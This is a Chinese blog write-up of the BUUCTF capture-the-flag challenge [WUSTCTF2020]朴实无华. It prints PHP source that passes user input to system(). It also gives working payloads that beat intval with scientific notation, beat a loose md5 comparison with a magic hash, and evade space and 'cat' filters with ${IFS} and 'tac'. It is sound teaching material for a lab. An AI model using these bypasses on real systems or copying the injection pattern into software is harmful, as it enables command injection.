buuctf-[WUSTCTF2020]朴实无华

打开环境就这么一句话

先打开index.php,但是没有什么

 

查看了下网络

看到gzip和php

buuctf-[WUSTCTF2020]朴实无华_第1张图片

我试了试www.zip

还有index.phps,也是一样的,都没找到文件

于是我想到用御剑扫,但是我好像线程太长了,一个没扫到,我就想到用dirsearch

扫到robots.txt了

buuctf-[WUSTCTF2020]朴实无华_第2张图片

访问

buuctf-[WUSTCTF2020]朴实无华_第3张图片 再访问,得到一个假的flag

想到用bp抓包了buuctf-[WUSTCTF2020]朴实无华_第4张图片

Look_at_me: /fl4g.php 

访问一下,发现都是乱码

搜索了一下火狐浏览器页面乱码怎么办

buuctf-[WUSTCTF2020]朴实无华_第5张图片

参考如何修复火狐浏览器的乱码问题(最新版)_火狐浏览器乱码_小宇特详解的博客-CSDN博客

找到修复文字编码

buuctf-[WUSTCTF2020]朴实无华_第6张图片

修复后正常了,这题怎么这么繁杂

buuctf-[WUSTCTF2020]朴实无华_第7张图片 

从level1开始研究

//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.
"; }else{ die("金钱解决不了穷人的本质问题"); } }else{ die("去非洲吧");

php真的忘得差不多了

先去搜了搜这个函数

buuctf-[WUSTCTF2020]朴实无华_第8张图片

这个函数可以通过科学计数法来绕过

buuctf-[WUSTCTF2020]朴实无华_第9张图片

1e10 会被识别为1但是

1e10+1后就会恢复原本 

所以传入

?num=1e10

绕过成功

 

再看level2

//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.
"; else die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲"); }else{ die("去非洲吧"); }

 ==是弱类型比较,上网搜了下

https://www.cnblogs.com/dre0m1/p/16062369.html

buuctf-[WUSTCTF2020]朴实无华_第10张图片

所以传入md5=0e215962017

成功绕过

再看level3

if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.
"; system($get_flag); }else{ die("快到非洲了"); } }else{ die("去非洲吧"); } ?>

先看看函数

buuctf-[WUSTCTF2020]朴实无华_第11张图片

过滤了空格和cat,这里用的${IFS}。

查看一下目录

?num=1e10&md5=0e215962017&get_flag=ls

buuctf-[WUSTCTF2020]朴实无华_第12张图片

然后cat用tac,做完感觉确实不难。

?num=1e10&md5=0e215962017&get_flag=tac${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

buuctf-[WUSTCTF2020]朴实无华_第13张图片 

你可能感兴趣的:(学习)